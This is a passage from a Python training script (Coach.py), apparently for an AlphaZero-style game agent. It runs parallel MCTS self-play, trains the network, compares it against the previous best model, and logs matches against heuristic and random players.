os.path.join(args.checkpoint, \"best.pth.tar\")\n pnet.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n pmcts = MCTS(game, pnet, args, args.lambdaHeur)\n nmcts = MCTS(game, nnet, args, args.lambdaHeur)\n\n arena = Arena(lambda b, p: np.argmax(pmcts.getActionProb(board=b, curPlayer=p, temp=1)),\n lambda b, p: np.argmax(nmcts.getActionProb(board=b, curPlayer=p, temp=1)),\n game, displaybar=args.displaybar)\n # each against process play the number of numPerProcessAgainst games.\n pwins, nwins, draws = arena.playGames(args.numPerProcessAgainst)\n return pwins, nwins, draws\n\ndef CheckResultAndSaveNetwork(pwins,nwins,draws,game,args,iter_num):\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n\n if float(nwins)/(pwins+nwins) > args.updateThreshold or (\n nwins==pwins and draws > args.updateThreshold):\n print('ACCEPTING NEW MODEL')\n net = nn(game, args.displaybar)\n net.load_checkpoint(folder=args.checkpoint, filename='train.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='best.pth.tar')\n net.save_checkpoint(folder=args.checkpoint, filename='checkpoint_' + str(iter_num) + '.pth.tar')\n else:\n print('REJECTING NEW MODEL')\n MyLogger.info('REJECTING NEW MODEL')\n print(draws)\n\ndef play_games(game, args, processID, enemy):\n np.random.seed(processID)\n #set gpu\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[processID%len(gpus)]\n \n #set gpu memory grow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth=True \n sess = tf.Session(config=config)\n\n \n # 
Players:\n heuristic = Heuristic(game).random_play\n policy = PolicyPlayer(game).play\n rp = RandomPlayer(game).play\n\n if enemy == \"heuristic\": second_player = heuristic\n elif enemy == \"rp\": second_player = rp\n elif enemy == \"n1p\":\n # improved nnet player\n n1 = nn(game)\n n1.load_checkpoint('./temp/','best.pth.tar')\n mcts1 = MCTS(game, n1, args, lambdaHeur=args.lambdaHeur)\n n1p = lambda b, p: np.argmax(mcts1.getActionProb(b, p, temp=0))\n\n second_player = n1p\n arena = Arena(n1p, heuristic, game, display=display)\n return arena.playGames(args.numPerProcessAgainst, verbose=False)\n\n arena = Arena(policy, second_player, game, display=display)\n \n return arena.playGames(args.numPerProcessAgainst, verbose=False)\n \ndef run_arena_parallel(game, args, enemy):\n pool = multiprocessing.Pool(processes=args.numAgainstPlayProcess)\n res = []\n for i in range(args.numAgainstPlayProcess):\n res.append(pool.apply_async(play_games,\n args=[game, args, i, enemy]))\n pool.close()\n pool.join()\n\n res2 = [r.get() for r in res]\n print(res2)\n return np.sum(res2, axis=0)[:2]\n \ndef logCurrentCapabilities(game, iter_num, args):\n gpus = args.setGPU.split(',')\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus[iter_num%len(gpus)]\n \n # improved nnet player\n n2 = nn(game)\n n2.load_checkpoint('./temp/','best.pth.tar')\n #args2 = dotdict({'numMCTSSims': args.numMCTSSims, 'cpuct':args.cpuct, 'multiGPU':True})\n mcts2 = MCTS(game, n2, args)\n n2p = lambda b, p: np.argmax(mcts2.getActionProb(b, p, temp=0))\n\n # Heuristic player:\n heuristic = Heuristic(game).random_play\n\n # Random Player:\n rp = RandomPlayer(game).play\n\n arena = Arena(n2p, heuristic, game, display=display)\n resultHeur = \"{} {}\".format(*arena.playGames(40, verbose=False)[:2])\n \n arena = Arena(n2p, rp, game, display=display)\n resultRand = \"{} {}\".format(*arena.playGames(40, verbose=False)[:2])\n \n MyLogger.info(\"Iter:{} Heuristic: {} Random: {}\".format(iter_num, resultHeur, resultRand))\n print(\"Iter:{} Heuristic: {} Random: {}\\n\".format(iter_num, resultHeur, resultRand))\n \nclass Coach():\n \"\"\"\n This class executes the self-play + learning. It uses the functions defined\n in Game and NeuralNet. 
args are specified in main.py.\n \"\"\"\n def __init__(self, game, args):\n self.game = game\n self.args = args\n self.trainExamplesHistory = []\n\n def parallel_self_play(self):\n temp = []\n result = []\n bar = Bar('Self Play (each process)', max=self.args.numPerProcessSelfPlay)\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numSelfPlayProcess)\n res = []\n for i in range(self.args.numSelfPlayProcess):\n res.append(pool.apply_async(AsyncSelfPlay,args=(self.game,self.args,i,bar,)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n else:\n result.append(AsyncSelfPlay(self.game, self.args, 0, bar))\n \n for i in result:\n for j in i:\n for trainData in j:\n temp += trainData\n return temp\n\n def parallel_train_network(self,iter_num):\n print(\"Start training network\")\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(AsyncTrainNetwork,args=(self.game,self.args,self.trainExamplesHistory,))\n pool.close()\n pool.join()\n else:\n AsyncTrainNetwork(self.game, self.args, self.trainExamplesHistory)\n\n def parallel_self_test_play(self,iter_num):\n print(\"Start test play\")\n bar = Bar('Test Play', max=self.args.numAgainstPlayProcess)\n result = []\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n res = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(AsyncAgainst,args=(self.game,self.args,i,bar)))\n pool.close()\n pool.join()\n for i in res:\n result.append(i.get())\n else:\n result.append(AsyncAgainst(self.game, self.args, 0, bar))\n\n pwins = 0\n nwins = 0\n draws = 0.0\n for i in result:\n pwins += i[0]\n nwins += i[1]\n draws += i[2]\n\n draws /= len(result)\n print(\"pwin: \"+str(pwins))\n print(\"nwin: \"+str(nwins))\n print(\"draw: \"+str(draws))\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=1)\n pool.apply_async(CheckResultAndSaveNetwork,args=(pwins,nwins,draws,self.game,self.args,iter_num,))\n pool.close()\n pool.join()\n else:\n CheckResultAndSaveNetwork(pwins, nwins, draws, self.game, self.args, iter_num)\n\n def parallel_check_against(self, iter_num, enemy):\n if self.args.multiCPU:\n pool = multiprocessing.Pool(processes=self.args.numAgainstPlayProcess)\n res = []\n for i in range(self.args.numAgainstPlayProcess):\n res.append(pool.apply_async(play_games,\n args=(self.game, self.args, i, enemy)))\n pool.close()\n pool.join()\n\n res2 = [r.get() for r in res]\n print(\"Parallel [{}]: {}/{} \".format(enemy, *np.sum(res2, axis=0)[:2].astype(int)))\n return np.sum(res2, axis=0)[:2].astype(int)\n\n def learn(self):\n \"\"\"\n Performs numIters iterations with numEps episodes of self-play in each\n iteration. 
After every iteration, it retrains the neural network with\n examples in trainExamples (which has a maximum length of maxlenOfQueue).\n It then pits the new neural network against the old one and accepts it\n only if it wins >= updateThreshold fraction of games.\n \"\"\"\n import time\n gamesNum = self.args.numSelfPlayProcess*self.args.numPerProcessSelfPlay\n MyLogger.info(\"============== New Run ==============\")\n MyLogger.info(\"sims: {} cpuct: {} gamesNum: {} coeff: {} evalDepth: {} alpha: {} eps: {}\".format(\n self.args.numMCTSSims, self.args.cpuct, gamesNum,\n self.args.coeff, self.args.evaluationDepth, self.args.alpha, self.args.epsilon))\n for i in range(1, self.args.numIters+1):\n start = time.time()\n print('------ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n temp = self.parallel_self_play()\n iterationTrainExamples += temp\n self.trainExamplesHistory.append(iterationTrainExamples)\n self.parallel_train_network(i)\n self.trainExamplesHistory.clear()\n self.parallel_self_test_play(i)\n if self.args.multiCPU:\n resultRand = self.parallel_check_against(i, \"rp\")\n resultHeur = self.parallel_check_against(i, \"heuristic\")\n resultMCTS = self.parallel_check_against(i, \"n1p\")\n\n MyLogger.info(\"Iter:{} Heuristic: {} Random: {} MCTS: {}\".\n format(i, resultHeur, resultRand, resultMCTS))\n else:\n logCurrentCapabilities(self.game, i, self.args)\n # Reduce influence of lambdaHeur\n #self.args.lambdaHeur*=0.95\n #self.args.cpuct*=0.95\n end = time.time()\n diff = end - start\n print(diff)\n","sub_path":"Coach.py","file_name":"Coach.py","file_ext":"py","file_size_in_byte":16075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}